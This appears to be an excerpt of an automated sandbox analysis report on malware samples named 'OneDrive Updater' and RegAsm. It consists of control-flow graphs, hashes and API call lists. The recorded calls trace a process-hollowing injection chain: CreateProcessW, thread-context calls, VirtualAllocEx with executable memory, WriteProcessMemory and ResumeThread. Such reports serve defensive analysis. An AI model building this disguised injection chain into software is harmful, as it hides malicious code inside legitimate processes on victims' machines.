                                    • Instruction Fuzzy Hash: 9B210EB1604200DFCB15DFA8D984B26FBA5EB84B14F60C569E84A4B356C33AD847CA61
                                    Memory Dump Source
                                    • Source File: 00000020.00000002.1823867595.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_32_2_163d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                                    • Instruction ID: ec8e80d1a371b3035b8c7fe69708f6b47e8f5008bd11a19aa4bf607f135cbbab
                                    • Opcode Fuzzy Hash: 17de7163a1e12a4c5df783ee0f29f24f6994aba7d146e6d7d26c00eb2d5c80d5
                                    • Instruction Fuzzy Hash: 5611DD75504280CFDB12CF58D9C4B16FFA1FB84718F28C6AAD8494B756C33AD44ACBA2

                                    Execution Graph

                                    Execution Coverage:15.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:52
                                    Total number of Limit Nodes:5
                                    execution_graph 2142 5790848 2143 5790853 2142->2143 2152 5792612 2143->2152 2145 57908cf 2149 5792612 5 API calls 2149->2145 2153 579261a 2152->2153 2154 57908a3 2153->2154 2177 57928d8 2153->2177 2187 57928c8 2153->2187 2154->2149 2157 57927d1 2154->2157 2162 5792867 2154->2162 2167 57927fc 2154->2167 2172 579282c 2154->2172 2158 57927dc 2157->2158 2159 57928a4 2158->2159 2160 57928d8 4 API calls 2158->2160 2161 57928c8 4 API calls 2158->2161 2159->2145 2160->2158 2161->2158 2164 57927ff 2162->2164 2163 57928a4 2163->2145 2164->2162 2164->2163 2165 57928d8 4 API calls 2164->2165 2166 57928c8 4 API calls 2164->2166 2165->2164 2166->2164 2168 57927c8 2167->2168 2168->2167 2169 57928a4 2168->2169 2170 57928d8 4 API calls 2168->2170 2171 57928c8 4 API calls 2168->2171 2169->2145 2170->2168 2171->2168 2173 57927ff 2172->2173 2174 57928a4 2173->2174 2175 57928d8 4 API calls 2173->2175 2176 57928c8 4 API calls 2173->2176 2174->2145 2175->2173 2176->2173 2178 5792943 2177->2178 2198 5791ec8 2178->2198 2180 57929c4 2181 5791ed4 Wow64GetThreadContext 2180->2181 2186 5792b35 2180->2186 2182 5792a1c 2181->2182 2183 5791ee0 ReadProcessMemory 2182->2183 2182->2186 2184 5792a5a 2183->2184 2185 5792aee VirtualAllocEx 2184->2185 2184->2186 2185->2186 2186->2153 2188 579285f 2187->2188 2189 57928cb 2187->2189 2188->2153 2190 5791ec8 CreateProcessW 2189->2190 2191 57929c4 2190->2191 2197 5792b35 2191->2197 2202 5791ed4 2191->2202 2196 5792aee VirtualAllocEx 2196->2197 2197->2153 2199 5792e68 CreateProcessW 2198->2199 2201 5792fb9 2199->2201 2201->2201 2203 5793098 Wow64GetThreadContext 2202->2203 2205 5792a1c 2203->2205 2205->2197 2206 5791ee0 2205->2206 2207 5793150 ReadProcessMemory 2206->2207 2208 5792a5a 2207->2208 2208->2196 2208->2197

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 62 57928d8-57929c6 call 5791ec8 71 57929cc-5792a05 62->71 72 5792d74-5792d87 62->72 78 5792d8e 71->78 79 5792a0b-5792a1e call 5791ed4 71->79 72->78 81 5792d93-5792dc6 78->81 83 5792d5a-5792d6d 79->83 84 5792a24-5792a2e 79->84 97 5792dc8-5792dff call 5791ac0 81->97 98 5792e05-5792e08 81->98 83->72 84->78 86 5792a34-5792a5c call 5791ee0 84->86 93 5792d40-5792d53 86->93 94 5792a62-5792a70 86->94 93->83 95 5792ad0-5792b33 VirtualAllocEx 94->95 96 5792a72-5792aad 94->96 113 5792b3c-5792b53 95->113 114 5792b35-5792b3b 95->114 104 5792aaf-5792ab5 96->104 105 5792ab6-5792aca 96->105 97->98 120 5792c8a-5792c9d 97->120 103 5792e30-5792e4f 98->103 104->105 105->95 108 5792d26-5792d39 105->108 108->93 115 5792b59-5792b6e call 5791ac0 113->115 116 5792d0c-5792d1f 113->116 114->113 126 5792cf2-5792d05 115->126 127 5792b74-5792b9b 115->127 116->108 133 5792ca4-5792cb7 120->133 126->116 127->81 132 5792ba1-5792bc0 call 5791ac0 127->132 132->133 140 5792bc6-5792bdd 132->140 141 5792cbe-5792cd1 133->141 143 5792bdf-5792be2 140->143 144 5792be5-5792bf4 140->144 151 5792cd8-5792ceb 141->151 143->144 144->78 145 5792bfa-5792c0a call 5791acc 144->145 145->141 150 5792c10-5792c48 145->150 154 5792c4a-5792c50 150->154 155 5792c51-5792c66 150->155 151->126 154->155 155->151 156 5792c68-5792c76 155->156 156->103 159 5792c7c-5792c85 156->159 159->103
                                    APIs
                                      • Part of subcall function 05791EC8: CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 05792FA4
                                      • Part of subcall function 05791ED4: Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,05792A1C), ref: 05793103
                                      • Part of subcall function 05791EE0: ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,05792A5A,?,00000004,?), ref: 057931C1
                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 05792B1F
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: Process$AllocContextCreateMemoryReadThreadVirtualWow64
                                    • String ID:
                                    • API String ID: 2545757285-0
                                    • Opcode ID: b514838fdc426b6ffd3c521bfe16ce456ec3fb3baa0c940b62489fe1c11d8be5
                                    • Instruction ID: 6aa1be69b393cf013aa963983c55de2db604b8643ce1f609cd561b3fc8727730
                                    • Opcode Fuzzy Hash: b514838fdc426b6ffd3c521bfe16ce456ec3fb3baa0c940b62489fe1c11d8be5
                                    • Instruction Fuzzy Hash: D5E1AC74E002199FCF18EFA5D854BAEBBF6BF84204F248169D40AAB291DF349D45CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 161 57928c8-57928c9 162 57928cb-57929c6 call 5791ec8 161->162 163 579285f-5792864 161->163 173 57929cc-5792a05 162->173 174 5792d74-5792d87 162->174 180 5792d8e 173->180 181 5792a0b-5792a1e call 5791ed4 173->181 174->180 183 5792d93-5792dc6 180->183 185 5792d5a-5792d6d 181->185 186 5792a24-5792a2e 181->186 199 5792dc8-5792dff call 5791ac0 183->199 200 5792e05-5792e08 183->200 185->174 186->180 188 5792a34-5792a5c call 5791ee0 186->188 195 5792d40-5792d53 188->195 196 5792a62-5792a70 188->196 195->185 197 5792ad0-5792b33 VirtualAllocEx 196->197 198 5792a72-5792aad 196->198 215 5792b3c-5792b53 197->215 216 5792b35-5792b3b 197->216 206 5792aaf-5792ab5 198->206 207 5792ab6-5792aca 198->207 199->200 222 5792c8a-5792c9d 199->222 205 5792e30-5792e4f 200->205 206->207 207->197 210 5792d26-5792d39 207->210 210->195 217 5792b59-5792b6e call 5791ac0 215->217 218 5792d0c-5792d1f 215->218 216->215 228 5792cf2-5792d05 217->228 229 5792b74-5792b9b 217->229 218->210 235 5792ca4-5792cb7 222->235 228->218 229->183 234 5792ba1-5792bc0 call 5791ac0 229->234 234->235 242 5792bc6-5792bdd 234->242 243 5792cbe-5792cd1 235->243 245 5792bdf-5792be2 242->245 246 5792be5-5792bf4 242->246 253 5792cd8-5792ceb 243->253 245->246 246->180 247 5792bfa-5792c0a call 5791acc 246->247 247->243 252 5792c10-5792c48 247->252 256 5792c4a-5792c50 252->256 257 5792c51-5792c66 252->257 253->228 256->257 257->253 258 5792c68-5792c76 257->258 258->205 261 5792c7c-5792c85 258->261 261->205
                                    APIs
                                      • Part of subcall function 05791EC8: CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 05792FA4
                                      • Part of subcall function 05791ED4: Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,05792A1C), ref: 05793103
                                      • Part of subcall function 05791EE0: ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,05792A5A,?,00000004,?), ref: 057931C1
                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 05792B1F
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: Process$AllocContextCreateMemoryReadThreadVirtualWow64
                                    • String ID:
                                    • API String ID: 2545757285-0
                                    • Opcode ID: c5dec0b51c25ebc58bce3c0c875dfd22493706fbff92bd0b8dfcbbb9d6b0c149
                                    • Instruction ID: 6142461796a2f18ef8fc1f1bfad8739035c6c76a26352f0b0f0d4169d65b5f32
                                    • Opcode Fuzzy Hash: c5dec0b51c25ebc58bce3c0c875dfd22493706fbff92bd0b8dfcbbb9d6b0c149
                                    • Instruction Fuzzy Hash: F5B1BC74E002199FDF24DFA5D884BDDBBF6BF88304F148169D409AB292DB34A985DF60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 287 5792e60-5792ee1 289 5792ee9-5792ef0 287->289 290 5792ee3-5792ee6 287->290 291 5792efb-5792f11 289->291 292 5792ef2-5792ef8 289->292 290->289 293 5792f1c-5792fb7 CreateProcessW 291->293 294 5792f13-5792f19 291->294 292->291 296 5792fb9-5792fbf 293->296 297 5792fc0-5793034 293->297 294->293 296->297 305 5793046-579304d 297->305 306 5793036-579303c 297->306 307 579304f-579305e 305->307 308 5793064 305->308 306->305 307->308 310 5793065 308->310 310->310
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 05792FA4
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 9b532ebbbe4dbf9646349fff56996f74a30a6a0de0300973981f9b2a7ff3f621
                                    • Instruction ID: 6aecbfef07a187f15e9ebb33a6d287c7ae04d37a170309b3e202222e0594d3dd
                                    • Opcode Fuzzy Hash: 9b532ebbbe4dbf9646349fff56996f74a30a6a0de0300973981f9b2a7ff3f621
                                    • Instruction Fuzzy Hash: B9512475901329EFDF24CF99C984BDEBBB6BF48300F04849AE508A7250D7759A84CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 263 5791ec8-5792ee1 265 5792ee9-5792ef0 263->265 266 5792ee3-5792ee6 263->266 267 5792efb-5792f11 265->267 268 5792ef2-5792ef8 265->268 266->265 269 5792f1c-5792fb7 CreateProcessW 267->269 270 5792f13-5792f19 267->270 268->267 272 5792fb9-5792fbf 269->272 273 5792fc0-5793034 269->273 270->269 272->273 281 5793046-579304d 273->281 282 5793036-579303c 273->282 283 579304f-579305e 281->283 284 5793064 281->284 282->281 283->284 286 5793065 284->286 286->286
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 05792FA4
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: bedf710322124b38936d024af817936dd9dd1f65a4948d59c2431e7435e65e64
                                    • Instruction ID: 8ed5ebb528848a6267c73810d39f0ee243be23bbd03bbabcb1b4d3f3015462da
                                    • Opcode Fuzzy Hash: bedf710322124b38936d024af817936dd9dd1f65a4948d59c2431e7435e65e64
                                    • Instruction Fuzzy Hash: 46512575901319EFDF24CF99C984BDEBBB6BF48300F04849AE909A7250D7759A84CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 311 5791ee0-57931ce ReadProcessMemory 313 57931d0-57931d6 311->313 314 57931d7-57931f8 311->314 313->314
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,05792A5A,?,00000004,?), ref: 057931C1
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: f0375a10c3a7dba79a1a4cfd32a91e5997ecbce13cbf53d31b85d62e755a7cbb
                                    • Instruction ID: 244917bcc116891e884157319deece2d4dec453e069ba11073fd921e32a4e035
                                    • Opcode Fuzzy Hash: f0375a10c3a7dba79a1a4cfd32a91e5997ecbce13cbf53d31b85d62e755a7cbb
                                    • Instruction Fuzzy Hash: 6421E2B5910659DFCB10CF9AD884BDEFBF4FB48310F10842AE958A7210C378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 316 5791ed4-57930d8 318 57930da-57930e2 316->318 319 57930e4-5793110 Wow64GetThreadContext 316->319 318->319 320 5793119-579313a 319->320 321 5793112-5793118 319->321 321->320
                                    APIs
                                    • Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,05792A1C), ref: 05793103
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 963879bc5f39696e8752bd672f13c71559d9fcc00d2675b76b8e93ae576754d4
                                    • Instruction ID: 4c3f24e01516b69f8eba22263ff06de7b31911c1ae073eb2d064997e640018cc
                                    • Opcode Fuzzy Hash: 963879bc5f39696e8752bd672f13c71559d9fcc00d2675b76b8e93ae576754d4
                                    • Instruction Fuzzy Hash: D71123B59146498FCB20CF9AD848BDEFBF5FB88320F14842AE458A7210D379A545CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 330 579314a-57931ce ReadProcessMemory 332 57931d0-57931d6 330->332 333 57931d7-57931f8 330->333 332->333
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,05792A5A,?,00000004,?), ref: 057931C1
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 44df3e37855dab5dd134aaf755352f461123f7ddbcc3ff467cd52eb2af93b10a
                                    • Instruction ID: 3328bac0d826bc258f1a0eb781addd45fbfc1d54180a668143a6ac77842da1d1
                                    • Opcode Fuzzy Hash: 44df3e37855dab5dd134aaf755352f461123f7ddbcc3ff467cd52eb2af93b10a
                                    • Instruction Fuzzy Hash: 7621E2B5900219DFCB10CF9AD885BDEFBF8FB48310F50842AE958A7250C378A544CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 323 5793090-57930d8 325 57930da-57930e2 323->325 326 57930e4-5793110 Wow64GetThreadContext 323->326 325->326 327 5793119-579313a 326->327 328 5793112-5793118 326->328 328->327
                                    APIs
                                    • Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,05792A1C), ref: 05793103
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1910118964.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_5790000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: bfce166a6fb5905451ad9b157f834ec9940e09b8622293068e73a443b2ce5079
                                    • Instruction ID: ad617071000911b401ae6eaa4ed7318d70d3f6c0edb03ea49f081ae2257d445e
                                    • Opcode Fuzzy Hash: bfce166a6fb5905451ad9b157f834ec9940e09b8622293068e73a443b2ce5079
                                    • Instruction Fuzzy Hash: 7C1153B2D106098FCB10CF9AC845BDEFBF4FB88320F14842AD428A7200D338A545CFA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 409 190d4b4-190d4c6 410 190d55a-190d561 409->410 411 190d4cc 409->411 412 190d4ce-190d4da 410->412 411->412 413 190d4e0-190d502 412->413 414 190d566-190d56b 412->414 416 190d570-190d585 413->416 417 190d504-190d522 413->417 414->413 421 190d53c-190d544 416->421 420 190d52a-190d53a 417->420 420->421 422 190d592 420->422 423 190d546-190d557 421->423 424 190d587-190d590 421->424 424->423
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1899907821.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_190d000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af6cce22432d69ea2003b943c32f1bb03cbd96e494060d7ced5d3f6224d08b13
                                    • Instruction ID: b83bc7236455e74e3822a0299e17413490f42b2ae98b7f397e8047e65611ad6a
                                    • Opcode Fuzzy Hash: af6cce22432d69ea2003b943c32f1bb03cbd96e494060d7ced5d3f6224d08b13
                                    • Instruction Fuzzy Hash: 0B210371504200EFDB06DF98D9C0F26BFA5FB88318F20C569ED0D4B29AC336D456CAA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 426 190d4af-190d4c6 427 190d55a-190d561 426->427 428 190d4cc 426->428 429 190d4ce-190d4da 427->429 428->429 430 190d4e0-190d502 429->430 431 190d566-190d56b 429->431 433 190d570-190d585 430->433 434 190d504-190d522 430->434 431->430 438 190d53c-190d544 433->438 437 190d52a-190d53a 434->437 437->438 439 190d592 437->439 440 190d546-190d557 438->440 441 190d587-190d590 438->441 441->440
                                    Memory Dump Source
                                    • Source File: 00000023.00000002.1899907821.000000000190D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0190D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_35_2_190d000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction ID: 54c4d077a97986170f8b5516405aa85b58573a732140b20609b7221497830ed5
                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                    • Instruction Fuzzy Hash: 1811E172404280CFCB02CF54D5C4B16BFB1FB88318F24C6A9DC090B29AC336D45ACBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 50 1052921-10529c6 call 1051ec8 59 1052d74-1052d87 50->59 60 10529cc-1052a05 50->60 66 1052d8e 59->66 60->66 67 1052a0b-1052a1e call 1051ed4 60->67 69 1052d93-1052dc6 66->69 71 1052a24-1052a2e 67->71 72 1052d5a-1052d6d 67->72 85 1052e05-1052e08 69->85 86 1052dc8-1052df8 call 1051ac0 69->86 71->66 74 1052a34-1052a5c call 1051ee0 71->74 72->59 79 1052d40-1052d53 74->79 80 1052a62-1052a70 74->80 79->72 83 1052ad0-1052b33 VirtualAllocEx 80->83 84 1052a72-1052aad 80->84 100 1052b35-1052b3b 83->100 101 1052b3c-1052b53 83->101 94 1052ab6-1052aca 84->94 95 1052aaf-1052ab5 84->95 89 1052e30-1052e4f 85->89 103 1052dfd-1052dff 86->103 94->83 96 1052d26-1052d39 94->96 95->94 96->79 100->101 104 1052d0c-1052d1f 101->104 105 1052b59-1052b6e call 1051ac0 101->105 103->85 107 1052c8a-1052c9d 103->107 104->96 114 1052b74-1052b9b 105->114 115 1052cf2-1052d05 105->115 122 1052ca4-1052cb7 107->122 114->69 120 1052ba1-1052bc0 call 1051ac0 114->120 115->104 120->122 128 1052bc6-1052bdd 120->128 129 1052cbe-1052cd1 122->129 131 1052be5-1052bf4 128->131 132 1052bdf-1052be2 128->132 139 1052cd8-1052ceb 129->139 131->66 134 1052bfa-1052c0a call 1051acc 131->134 132->131 134->129 138 1052c10-1052c48 ResumeThread 134->138 140 1052c51-1052c66 138->140 141 1052c4a-1052c50 138->141 139->115 140->139 142 1052c68-1052c76 140->142 141->140 142->89 144 1052c7c-1052c85 142->144 144->89
                                    APIs
                                      • Part of subcall function 01051EC8: CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 01052FA4
                                      • Part of subcall function 01051ED4: Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,01052A1C), ref: 01053103
                                      • Part of subcall function 01051EE0: ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,01052A5A,?,00000004,?), ref: 010531C1
                                    • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 01052B1F
                                    • ResumeThread.KERNELBASE(?), ref: 01052C34
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: ProcessThread$AllocContextCreateMemoryReadResumeVirtualWow64
                                    • String ID:
                                    • API String ID: 2498194165-0
                                    • Opcode ID: 546cb98593fbeb223feafc954d147c09fbc432ae7aa0027f4cf44e364b2eae16
                                    • Instruction ID: 6d2d9631f453f3a0c251df3444eec7e6387a86bb42cfcf1feabb0cd25ec7e92d
                                    • Opcode Fuzzy Hash: 546cb98593fbeb223feafc954d147c09fbc432ae7aa0027f4cf44e364b2eae16
                                    • Instruction Fuzzy Hash: 37D1C070E002198BDB59DFB9C854BAEBBF2BF84304F248169D849AB295DF309D45CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 148 1052e5c-1052e5d 149 1052e85-1052ee1 148->149 150 1052e5f-1052e82 148->150 151 1052ee3-1052ee6 149->151 152 1052ee9-1052ef0 149->152 150->149 151->152 153 1052ef2-1052ef8 152->153 154 1052efb-1052f11 152->154 153->154 155 1052f13-1052f19 154->155 156 1052f1c-1052fb7 CreateProcessW 154->156 155->156 158 1052fc0-1053034 156->158 159 1052fb9-1052fbf 156->159 167 1053046-105304d 158->167 168 1053036-105303c 158->168 159->158 169 1053064 167->169 170 105304f-105305e 167->170 168->167 172 1053065 169->172 170->169 172->172
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 01052FA4
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 939c1e81bf81328b381320b998e38720f1e42141b2cd262b8955b6b582493b01
                                    • Instruction ID: a4ea263b70f562b66e3199a1bf09680e7fa66da1c4148338102f6a3d0d3b5d3f
                                    • Opcode Fuzzy Hash: 939c1e81bf81328b381320b998e38720f1e42141b2cd262b8955b6b582493b01
                                    • Instruction Fuzzy Hash: D4513571901319DFDB64CF99C944BDEBBB5BF48300F0480EAE948AB250D7759A84CF51

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 173 1051ec8-1052ee1 175 1052ee3-1052ee6 173->175 176 1052ee9-1052ef0 173->176 175->176 177 1052ef2-1052ef8 176->177 178 1052efb-1052f11 176->178 177->178 179 1052f13-1052f19 178->179 180 1052f1c-1052fb7 CreateProcessW 178->180 179->180 182 1052fc0-1053034 180->182 183 1052fb9-1052fbf 180->183 191 1053046-105304d 182->191 192 1053036-105303c 182->192 183->182 193 1053064 191->193 194 105304f-105305e 191->194 192->191 196 1053065 193->196 194->193 196->196
                                    APIs
                                    • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 01052FA4
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 7539f62e4b304a371758dd9b91843259d8e2d7541c204a9b83fcdbf511f08be9
                                    • Instruction ID: ae84c5b20cbcbf57ca01f511d679cefd678b2128b25febe43e553c316ba00671
                                    • Opcode Fuzzy Hash: 7539f62e4b304a371758dd9b91843259d8e2d7541c204a9b83fcdbf511f08be9
                                    • Instruction Fuzzy Hash: CF510571901319DFDF64CF99C984BDEBBB6BF48300F1480AAE948AB250D7759A84CF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 197 1053208-1053209 198 1053231 197->198 199 105320b-105322b 197->199 200 1053232-1053256 198->200 201 10531fa 198->201 199->198 202 1053260-1053299 WriteProcessMemory 200->202 203 1053258-105325e 200->203 201->197 204 10532a2-10532c3 202->204 205 105329b-10532a1 202->205 203->202 205->204
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?,?,?,?,00000000,00000000,?,01052DFD,?,?,00000000), ref: 0105328C
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: e9c9273171dc7f2977ff7d0f0f6202a14b14a4acd268652b1f5f6cda91d48f21
                                    • Instruction ID: 761e48986eece3990e66846943ae363a4ac4384f51dd33073d6dbb49994ec237
                                    • Opcode Fuzzy Hash: e9c9273171dc7f2977ff7d0f0f6202a14b14a4acd268652b1f5f6cda91d48f21
                                    • Instruction Fuzzy Hash: AA2166B19007498FDB50CFAAC984BDEBFF4FB08350F04806AE958A7210D378A944CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 207 1051ac0-1053256 209 1053260-1053299 WriteProcessMemory 207->209 210 1053258-105325e 207->210 211 10532a2-10532c3 209->211 212 105329b-10532a1 209->212 210->209 212->211
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?,?,?,?,00000000,00000000,?,01052DFD,?,?,00000000), ref: 0105328C
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: aa2a3bb779cdd09cb5748c78077c788cd8aaa09b8adc72164b1be2260ce88901
                                    • Instruction ID: 1645efbeafc801c607e07dcf79f38c3cf6e37ba95733a50b94bb72b4e3ad53d4
                                    • Opcode Fuzzy Hash: aa2a3bb779cdd09cb5748c78077c788cd8aaa09b8adc72164b1be2260ce88901
                                    • Instruction Fuzzy Hash: 792104B1901709DFDB50CF9AC884BDEBBF4FB08350F10842AE958A7240D378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 214 1051ee0-10531ce ReadProcessMemory 216 10531d7-10531f8 214->216 217 10531d0-10531d6 214->217 217->216
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,00010002,?,?,?,?,?,?,01052A5A,?,00000004,?), ref: 010531C1
                                    Memory Dump Source
                                    • Source File: 00000037.00000002.2066184092.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_55_2_1050000_OneDrive Updater.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: e225628a027576e3e609ffb5633c90e9f0ee24f7b52c578f0fdb78acbbf5d3df
